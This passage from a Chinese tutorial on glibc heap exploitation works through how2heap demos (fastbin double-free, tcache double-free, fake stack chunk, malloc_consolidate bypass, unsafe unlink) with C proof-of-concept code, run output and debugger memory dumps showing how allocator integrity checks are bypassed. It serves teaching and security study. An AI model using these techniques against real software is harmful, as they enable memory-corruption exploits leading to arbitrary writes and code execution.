2nd malloc(256): 0x611000009f00
first allocation 0x61500000fd00 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x61500000fa80
3rd allocation 0x61500000fa80 points to CCCCCCCC
=================================================================
==4525==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500000fd00 at pc 0x7f49d14a61e9 bp 0x7ffe40b526e0 sp 0x7ffe40b51e58
READ of size 2 at 0x61500000fd00 thread T0
    #0 0x7f49d14a61e8  (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x601e8)
    #1 0x7f49d14a6bcc in vfprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60bcc)
    #2 0x7f49d14a6cf9 in fprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60cf9)
    #3 0x400b8b in main /home/firmy/how2heap/first_fit.c:23
    #4 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #5 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)

0x61500000fd00 is located 0 bytes inside of 512-byte region [0x61500000fd00,0x61500000ff00)
freed by thread T0 here:
    #0 0x7f49d14de2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400aa2 in main /home/firmy/how2heap/first_fit.c:17
    #2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7f49d14de602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400957 in main /home/firmy/how2heap/first_fit.c:6
    #2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

一个很明显的 use-after-free 漏洞。关于这类漏洞的详细利用过程，我们会在后面的章节里再讲。

fastbin_dup

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    fprintf(stderr, "Allocating 3 buffers.\n");
    char *a = malloc(9);
    char *b = malloc(9);
    char *c = malloc(9);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);

    fprintf(stderr, "Freeing the first one %p.\n", a);
    free(a);
    fprintf(stderr, "Then freeing another one %p.\n", b);
    free(b);
    fprintf(stderr, "Freeing the first one %p again.\n", a);
    free(a);

    fprintf(stderr, "Allocating 3 buffers.\n");
    char *d = malloc(9);
    char *e = malloc(9);
    char *f = malloc(9);
    strcpy(d, "DDDDDDDD");
    fprintf(stderr, "4st malloc(9) %p points to %s the first time\n", d, d);
    strcpy(e, "EEEEEEEE");
    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
    strcpy(f, "FFFFFFFF");
    fprintf(stderr, "6rd malloc(9) %p points to %s the second time\n", f, f);
}
$ gcc -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x1c07010 points to AAAAAAAA
2nd malloc(9) 0x1c07030 points to BBBBBBBB
3rd malloc(9) 0x1c07050 points to CCCCCCCC
Freeing the first one 0x1c07010.
Then freeing another one 0x1c07030.
Freeing the first one 0x1c07010 again.
Allocating 3 buffers.
4st malloc(9) 0x1c07010 points to DDDDDDDD the first time
5nd malloc(9) 0x1c07030 points to EEEEEEEE
6rd malloc(9) 0x1c07010 points to FFFFFFFF the second time

这个程序展示了利用 fastbins 的 double-free 攻击，可以泄漏出一块已经被分配的内存指针。fastbins 可以看成一个 LIFO 的栈，使用单链表实现，通过 fastbin->fd 来遍历 fastbins。由于 free 的过程会对 free list 做检查，我们不能连续两次 free 同一个 chunk，所以这里在两次 free 之间，增加了一次对其他 chunk 的 free 过程，从而绕过检查顺利执行。然后再 malloc 三次，就在同一个地址 malloc 了两次，也就有了两个指向同一块内存区域的指针。

libc-2.23 中对 double-free 的检查过程如下：

    /* Check that the top of the bin is not the record we are going to add
       (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
      }

它在检查 fast bin 的 double-free 时只是检查了第一个块。所以其实是存在缺陷的。

三个 malloc 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1 <-- top chunk
0x602070:   0x0000000000000000

第一个 free 之后，chunk a 被添加到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed]
0x602010:   0x0000000000000000  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

第二个 free 之后，chunk b 被添加到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed]
0x602010:   0x0000000000000000  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

此时由于 chunk a 处于 bin 中第 2 块的位置，不会被 double-free 的检查机制检查出来。所以第三个 free 之后，chunk a 再次被添加到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed again]
0x602010:   0x0000000000602020  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  →  [loop detected]

此时 chunk a 和 chunk b 似乎形成了一个环。

再三个 malloc 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk d, chunk f
0x602010:   0x4646464646464646  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk e
0x602030:   0x4545454545454545  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000

所以对于 fastbins，可以通过 double-free 泄漏出一个堆块的指针。

加上内存检测参数重新编译：

$ gcc -fsanitize=address -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x60200000eff0 points to AAAAAAAA
2nd malloc(9) 0x60200000efd0 points to BBBBBBBB
3rd malloc(9) 0x60200000efb0 points to CCCCCCCC
Freeing the first one 0x60200000eff0.
Then freeing another one 0x60200000efd0.
Freeing the first one 0x60200000eff0 again.
=================================================================
==5650==ERROR: AddressSanitizer: attempting double-free on 0x60200000eff0 in thread T0:
    #0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400ba3 in main /home/firmy/how2heap/fastbin_dup.c:22
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #3 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)

0x60200000eff0 is located 0 bytes inside of 9-byte region [0x60200000eff0,0x60200000eff9)
freed by thread T0 here:
    #0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400b0d in main /home/firmy/how2heap/fastbin_dup.c:18
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7fdc18ebf602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400997 in main /home/firmy/how2heap/fastbin_dup.c:7
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

一个很明显的 double-free 漏洞。关于这类漏洞的详细利用过程，我们会在后面的章节里再讲。

看一点新鲜的，在 libc-2.26 中，即使两次 free，也并没有触发 double-free 的异常检测，这与 tcache 机制有关，以后会详细讲述。这里先看个能够在该版本下触发 double-free 的例子：

#include <stdio.h>
#include <stdlib.h>

int main() {
    int i;

    void *p = malloc(0x40);
    fprintf(stderr, "First allocate a fastbin: p=%p\n", p);

    fprintf(stderr, "Then free(p) 7 times\n");
    for (i = 0; i < 7; i++) {
        fprintf(stderr, "free %d: %p => %p\n", i+1, &p, p);
        free(p);
    }

    fprintf(stderr, "Then malloc 8 times at the same address\n");
    int *a[10];
    for (i = 0; i < 8; i++) {
        a[i] = malloc(0x40);
        fprintf(stderr, "malloc %d: %p => %p\n", i+1, &a[i], a[i]);
    }

    fprintf(stderr, "Finally trigger double-free\n");
    for (i = 0; i < 2; i++) {
        fprintf(stderr, "free %d: %p => %p\n", i+1, &a[i], a[i]);
        free(a[i]);
    }
}
$ gcc -g tcache_double-free.c
$ ./a.out
First allocate a fastbin: p=0x559e30950260
Then free(p) 7 times
free 1: 0x7ffc498b2958 => 0x559e30950260
free 2: 0x7ffc498b2958 => 0x559e30950260
free 3: 0x7ffc498b2958 => 0x559e30950260
free 4: 0x7ffc498b2958 => 0x559e30950260
free 5: 0x7ffc498b2958 => 0x559e30950260
free 6: 0x7ffc498b2958 => 0x559e30950260
free 7: 0x7ffc498b2958 => 0x559e30950260
Then malloc 8 times at the same address
malloc 1: 0x7ffc498b2960 => 0x559e30950260
malloc 2: 0x7ffc498b2968 => 0x559e30950260
malloc 3: 0x7ffc498b2970 => 0x559e30950260
malloc 4: 0x7ffc498b2978 => 0x559e30950260
malloc 5: 0x7ffc498b2980 => 0x559e30950260
malloc 6: 0x7ffc498b2988 => 0x559e30950260
malloc 7: 0x7ffc498b2990 => 0x559e30950260
malloc 8: 0x7ffc498b2998 => 0x559e30950260
Finally trigger double-free
free 1: 0x7ffc498b2960 => 0x559e30950260
free 2: 0x7ffc498b2968 => 0x559e30950260
double free or corruption (fasttop)
[2]    1244 abort (core dumped)  ./a.out

fastbin_dup_into_stack

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    unsigned long long stack_var = 0x21;
    fprintf(stderr, "Allocating 3 buffers.\n");
    char *a = malloc(9);
    char *b = malloc(9);
    char *c = malloc(9);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);

    fprintf(stderr, "Freeing the first one %p.\n", a);
    free(a);
    fprintf(stderr, "Then freeing another one %p.\n", b);
    free(b);
    fprintf(stderr, "Freeing the first one %p again.\n", a);
    free(a);

    fprintf(stderr, "Allocating 4 buffers.\n");
    unsigned long long *d = malloc(9);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
    fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
    char *e = malloc(9);
    strcpy(e, "EEEEEEEE");
    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
    char *f = malloc(9);
    strcpy(f, "FFFFFFFF");
    fprintf(stderr, "6rd malloc(9) %p points to %s\n", f, f);
    char *g = malloc(9);
    strcpy(g, "GGGGGGGG");
    fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
}
$ gcc -g fastbin_dup_into_stack.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0xcf2010 points to AAAAAAAA
2nd malloc(9) 0xcf2030 points to BBBBBBBB
3rd malloc(9) 0xcf2050 points to CCCCCCCC
Freeing the first one 0xcf2010.
Then freeing another one 0xcf2030.
Freeing the first one 0xcf2010 again.
Allocating 4 buffers.
4nd malloc(9) 0xcf2010 points to 0x7ffd1e0d48b0
5nd malloc(9) 0xcf2030 points to EEEEEEEE
6rd malloc(9) 0xcf2010 points to FFFFFFFF
7th malloc(9) 0x7ffd1e0d48b0 points to GGGGGGGG

这个程序展示了怎样通过修改 fd 指针，将其指向一个伪造的 free chunk，在伪造的地址处 malloc 出一个 chunk。该程序大部分内容都和上一个程序一样，漏洞也同样是 double-free，只有给 fd 填充的内容不一样。

三个 malloc 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1 <-- top chunk
0x602070:   0x0000000000000000

三个 free 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed twice]
0x602010:   0x0000000000602020  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  →  [loop detected]

这一次 malloc 之后，我们不再填充无意义的 "DDDDDDDD"，而是填充一个地址，即栈地址减去 0x8，从而在栈上伪造出一个 free 的 chunk（当然也可以是其他的地址）。这也是为什么 stack_var 被我们设置为 0x21（或0x20都可以），其实是为了在栈地址减去 0x8 的时候作为 fake chunk 的 size 字段。

glibc 在执行分配操作时，若块的大小符合 fast bin，则会在对应的 bin 中寻找合适的块，此时 glibc 将根据候选块的 size 字段计算出 fastbin 索引，然后与对应 bin 在 fastbin 中的索引进行比较，如果二者不匹配，则说明块的 size 字段遭到破坏。所以需要 fake chunk 的 size 字段被设置为正确的值。

/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      [...]

      if (victim != 0)
        {
          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
            {
              errstr = "malloc(): memory corruption (fast)";
              [...]
            }
            [...]
        }
    }

简单地说就是 fake chunk 的 size 与 double-free 的 chunk 的 size 相同即可。

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk d
0x602010:   0x00007fffffffdc30  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  p &stack_var
$4 = (unsigned long long *) 0x7fffffffdc38
gef➤  x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000  0x0000000000000021 <-- fake chunk [seems to be freed]
0x7fffffffdc40: 0x0000000000602010  0x0000000000602010      <-- fd pointer
0x7fffffffdc50: 0x0000000000602030
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]

可以看到，伪造的 chunk 已经由指针链接到 fastbins 上了。之后 malloc 两次，即可将伪造的 chunk 移动到链表头部：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021
0x602010:   0x4646464646464646  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021
0x602030:   0x4545454545454545  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]

再次 malloc，即可在 fake chunk 处分配内存：

gef➤  x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000  0x0000000000000021 <-- fake chunk
0x7fffffffdc40: 0x4747474747474747  0x0000000000602000
0x7fffffffdc50: 0x0000000000602030

所以对于 fastbins，可以通过 double-free 覆盖 fastbins 的结构，来获得一个指向任意地址的指针。

fastbin_dup_consolidate

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

int main() {
    void *p1 = malloc(0x10);
    void *p2 = malloc(0x10);
    strcpy(p1, "AAAAAAAA");
    strcpy(p2, "BBBBBBBB");
    fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);

    fprintf(stderr, "Now free p1!\n");
    free(p1);

    void *p3 = malloc(0x400);
    fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
    fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");

    free(p1);
    fprintf(stderr, "Trigger the double free vulnerability!\n");
    fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");

    void *p4 = malloc(0x10);
    strcpy(p4, "CCCCCCC");
    void *p5 = malloc(0x10);
    strcpy(p5, "DDDDDDDD");
    fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", p4, p5);
}
$ gcc -g fastbin_dup_consolidate.c
$ ./a.out
Allocated two fastbins: p1=0x17c4010 p2=0x17c4030
Now free p1!
Allocated large bin to trigger malloc_consolidate(): p3=0x17c4050
In malloc_consolidate(), p1 is moved to the unsorted bin.
Trigger the double free vulnerability!
We can pass the check in malloc() since p1 is not fast top.
Now p1 is in unsorted bin and fast bin. So we'will get it twice: 0x17c4010 0x17c4010

这个程序展示了利用在 large bin 的分配中 malloc_consolidate 机制绕过 fastbin 对 double free 的检查，这个检查在 fastbin_dup 中已经展示过了，只不过它利用的是在两次 free 中间插入一次对其它 chunk 的 free。

首先分配两个 fast chunk：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1  <-- top chunk
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000

释放掉 p1，则空闲 chunk 加入到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed]
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1  <-- top chunk
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

此时如果我们再次释放 p1，必然触发 double free 异常，然而，如果此时分配一个 large chunk，效果如下：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed]
0x602010:   0x00007ffff7dd1b88  0x00007ffff7dd1b88      <-- fd, bk pointer
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

可以看到 fastbins 中的 chunk 已经不见了，反而出现在了 small bins 中，并且 chunk p2 的 prev_size 和 size 字段都被修改。

看一下 large chunk 的分配过程：

  /*
     If this is a large request, consolidate fastbins before continuing.
     While it might look excessive to kill all fastbins before
     even seeing if there is space available, this avoids
     fragmentation problems normally associated with fastbins.
     Also, in practice, programs tend to have runs of either small or
     large requests, but less often mixtures, so consolidation is not
     invoked all that often in most programs. And the programs that
     it is called frequently in otherwise tend to fragment.
   */

  else
    {
      idx = largebin_index (nb);
      if (have_fastchunks (av))
        malloc_consolidate (av);
    }

当分配 large chunk 时，首先根据 chunk 的大小获得对应的 large bin 的 index，接着判断当前分配区的 fast bins 中是否包含 chunk，如果有，调用 malloc_consolidate() 函数合并 fast bins 中的 chunk，并将这些空闲 chunk 加入 unsorted bin 中。因为这里分配的是一个 large chunk，所以 unsorted bin 中的 chunk 按照大小被放回 small bins 或 large bins 中。

由于此时 p1 已经不在 fastbins 的顶部，可以再次释放 p1：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [double freed]
0x602010:   0x0000000000000000  0x00007ffff7dd1b88
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

p1 被再次放入 fastbins，于是 p1 同时存在于 fabins 和 small bins 中。

第一次 malloc，chunk 将从 fastbins 中取出：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed], chunk p4
0x602010:   0x0043434343434343  0x00007ffff7dd1b88
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

第二次 malloc，chunk 从 small bins 中取出：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p4, chunk p5
0x602010:   0x4444444444444444  0x00007ffff7dd1b00
0x602020:   0x0000000000000020  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000

chunk p4 和 p5 在同一位置。

unsafe_unlink

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

uint64_t *chunk0_ptr;

int main() {
    int malloc_size = 0x80; // not fastbins
    int header_size = 2;

    chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
    uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
    fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
    fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);

    // pass this check: (P->fd->bk != P || P->bk->fd != P) == False
    chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
    chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
    fprintf(stderr, "Fake chunk fd: %p\n", (void*) chunk0_ptr[2]);
    fprintf(stderr, "Fake chunk bk: %p\n\n", (void*) chunk0_ptr[3]);
    // pass this check: (chunksize(P) != prev_size (next_chunk(P)) == False
    // chunk0_ptr[1] = 0x0; // or 0x8, 0x80

    uint64_t *chunk1_hdr = chunk1_ptr - header_size;
    chunk1_hdr[0] = malloc_size;
    chunk1_hdr[1] &= ~1;

    // deal with tcache
    // int *a[10];
    // int i;
    // for (i = 0; i < 7; i++) {
    //   a[i] = malloc(0x80);
    // }
    // for (i = 0; i < 7; i++) {
    //   free(a[i]);
    // }
    free(chunk1_ptr);

    char victim_string[9];
    strcpy(victim_string, "AAAAAAAA");
    chunk0_ptr[3] = (uint64_t) victim_string;
    fprintf(stderr, "Original value: %s\n", victim_string);

    chunk0_ptr[0] = 0x4242424242424242LL;
    fprintf(stderr, "New Value: %s\n", victim_string);
}
$ gcc -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x601070, pointing to 0x721010
The victim chunk we are going to corrupt is at 0x7210a0

Fake chunk fd: 0x601058
Fake chunk bk: 0x601060

Original value: AAAAAAAA
New Value: BBBBBBBB

这个程序展示了怎样利用 free 改写全局指针 chunk0_ptr 达到任意内存写的目的，即 unsafe unlink。该技术最常见的利用场景是我们有一个可以溢出漏洞和一个全局指针。

Ubuntu16.04 使用 libc-2.23，其中 unlink 实现的代码如下，其中有一些对前后堆块的检查，也是我们需要绕过的：

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;                                      \
    BK = P->bk;                                      \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))              \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
    else {                                      \
        FD->bk = BK;                                  \
        BK->fd = FD;                                  \
        if (!in_smallbin_range (P->size)                      \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {              \
        if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)          \
        || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
          malloc_printerr (check_action,                      \
                   "corrupted double-linked list (not small)",    \
                   P, AV);                          \
            if (FD->fd_nextsize == NULL) {                      \
                if (P->fd_nextsize == P)                      \
                  FD->fd_nextsize = FD->bk_nextsize = FD;              \
                else {                                  \
                    FD->fd_nextsize = P->fd_nextsize;                  \
                    FD->bk_nextsize = P->bk_nextsize;                  \
                    P->fd_nextsize->bk_nextsize = FD;                  \
                    P->bk_nextsize->fd_nextsize = FD;                  \
                  }                                  \
              } else {                                  \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;              \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;              \
              }                                      \
          }                                      \
      }                                          \
}

在解链操作之前，针对堆块 P 自身的 fd 和 bk 检查了链表的完整性，即判断堆块 P 的前一块 fd 的指针是否指向 P，以及后一块 bk 的指针是否指向 P。

